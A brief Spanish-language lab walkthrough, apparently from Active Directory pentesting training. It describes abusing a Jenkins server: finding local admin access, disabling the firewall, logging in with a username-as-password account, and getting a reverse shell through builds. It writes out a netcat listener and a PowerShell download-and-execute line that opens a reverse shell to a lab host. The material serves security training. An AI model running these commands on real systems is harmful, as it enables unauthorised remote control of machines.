Feature abuse (Jenkins)

Despues de obtener privilegios con administrador vemos en que maquina tenemos dicho privilegio

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
set computername

[snip]

Ahora vamos a vulnerar jenkins, (desactivar firewall)

  • 1 desactivar firewall
  • 2 account takeover: builderuser usa el mismo username como contraseΓ±a
  • 3 revershe shell en build functionality
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

powershell.exe iex (iwr http://172.16.100.44/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.44 -Port 443
Test-NetConnection -ComputerName 172.16.99.44 -Port 80